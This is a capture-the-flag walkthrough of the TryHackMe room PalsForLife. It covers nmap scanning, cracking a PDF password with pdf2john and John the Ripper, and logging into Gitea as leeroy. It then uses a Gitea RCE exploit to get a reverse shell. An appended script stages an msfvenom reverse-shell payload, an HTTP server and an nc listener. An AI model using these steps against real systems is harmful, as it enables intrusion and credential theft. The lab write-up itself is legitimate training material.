PalsForLife is a medium-difficulty room on the TryHackMe platform. The room consists of a vulnerable Gitea application through which we can gain authenticated command execution on a Kubernetes cluster. Once inside the cluster, we can look around for the Kubernetes service account secret token and eventually break out of the pod as root by creating a Kubernetes pod of our own.

We start off by running nmap on the target, scanning all ports with the SYN (stealth) scan option -sS and performing service and version detection with -sV. The services on the machine can take some time to start up, so give the machine a minute or two before starting the scan.

When we try to open the PDF file, we find that it is password protected. pdf2john converts the file into a hash format that can be fed to John the Ripper, and john can then crack the password using the rockyou.txt wordlist. Once we have the password, we can read the contents of the PDF, which gives us a piece of text. We haven't found a place where we can use this text yet, so let's enumerate the other ports.

Examining port 31111, we can see that the site is running an instance of Gitea. While it is possible to register a user and gain access to the application, we will log in as an existing user to get Flag 1. While exploring the application, we come across a user named leeroy in /explore/users. We can try logging in to the application with the username leeroy and the text found in the PDF document, and this successfully logs us into Gitea as leeroy.

On examining the settings of the jenkins repository, we come across a tab for webhooks with an entry pointing to an internal IP address. The webhook has a secret, which we can expose by viewing the source code of the page or by using the browser's Developer Tools; Flag 1 is the value of that input tag.

Looking up exploits for Gitea, we find an RCE exploit for it. To leverage this exploit, we need to create a reverse-shell payload using msfvenom, serve the file on a web server, and run the exploit. It does take some time for the exploit to run on the target, so if nothing comes back, run another command such as ping through the same route to force the command execution to happen. This will return a reverse shell on the listener as the user git.
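The recon, PDF-cracking and exploit-staging steps described above, collected into one script. This is an added example and not part of the original writeup: the target address, LHOST/LPORT, the PDF file name doc.pdf, the msfvenom payload type and the webhook form markup are all placeholders or assumptions, and the sample nmap output and HTML are constructed so that the two parsing helpers (open_ports and input_values) can be exercised offline without a target.

```shell
#!/bin/sh
# Added example, not from the original writeup: the recon, PDF-cracking and
# exploit-staging steps as shell functions, plus two pure-shell helpers
# (open_ports, input_values) that work on saved output so they run offline.
# Assumptions (placeholders, not values from the room): TARGET, LHOST, LPORT,
# the PDF name doc.pdf, the msfvenom payload type, and the webhook form markup.
set -e

TARGET="${TARGET:-10.10.10.10}"
LHOST="${LHOST:-10.9.0.1}"
LPORT="${LPORT:-4444}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Full TCP sweep (-p-) with SYN scan and version detection; -oA also writes
# grepable output (scan_<target>.gnmap) that open_ports can parse.
recon() {
    sudo nmap -sS -sV -p- -oA "scan_$TARGET" "$TARGET"
}

# Print "port/proto service" for each open port in nmap grepable output on stdin.
# Grepable "Ports:" entries look like 22/open/tcp//ssh//OpenSSH 8.2p1/, so field 2
# is the state, field 3 the protocol and field 5 the service name.
open_ports() {
    awk -F'Ports: ' '/Ports:/ {
        n = split($2, entries, ", ")
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] == "open") print f[1] "/" f[3] " " f[5]
        }
    }'
}

# pdf2john turns the PDF's /Encrypt dictionary into a john hash line; john then
# tries every rockyou.txt candidate against it and --show prints the result.
crack_pdf() {
    pdf="$1"
    pdf2john "$pdf" > "$pdf.hash"
    john --wordlist="$WORDLIST" "$pdf.hash"
    john --show "$pdf.hash"
}

# Extract name=value pairs from <input> tags in a saved page (stdin). This is
# the command-line equivalent of reading the webhook form in the page source;
# it assumes name= precedes value= inside each tag, as in the sample below.
input_values() {
    grep -o '<input[^>]*>' | sed -n 's/.*name="\([^"]*\)".*value="\([^"]*\)".*/\1=\2/p'
}

# Reverse-shell payload (payload type is an assumption), served over HTTP so the
# exploit can fetch it, with a listener waiting for the callback from user git.
stage_payload() {
    msfvenom -p linux/x64/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f elf -o shell.elf
    python3 -m http.server 8000 &
    nc -lvnp "$LPORT"
}

# Constructed sample data so the parsers can be exercised without a target.
SAMPLE_GNMAP=$(printf 'Host: 10.10.10.10 ()\tStatus: Up\nHost: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/closed/tcp//http///, 31111/open/tcp//http//Gitea/\tIgnored State: closed (65532)\n')
SAMPLE_HTML='<form><input name="payload_url" type="text" value="http://10.0.0.5:8080/hook"><input name="secret" type="password" value="THM{constructed_sample}"></form>'

case "${1:-}" in
    recon)   recon ;;
    crack)   crack_pdf "${2:-doc.pdf}" ;;
    stage)   stage_payload ;;
    *)       printf '%s\n' "$SAMPLE_GNMAP" | open_ports
             printf '%s\n' "$SAMPLE_HTML" | input_values ;;
esac
```

Run it with no arguments to see the parsers work on the constructed samples; `recon`, `crack` and `stage` invoke the real tools against the placeholder target. Saving the scan with -oA is what makes the "enumerate the other ports" step scriptable: `open_ports < scan_$TARGET.gnmap` lists exactly the ports worth a closer look, and pointing input_values at a saved copy of the webhook settings page recovers the secret without opening Developer Tools.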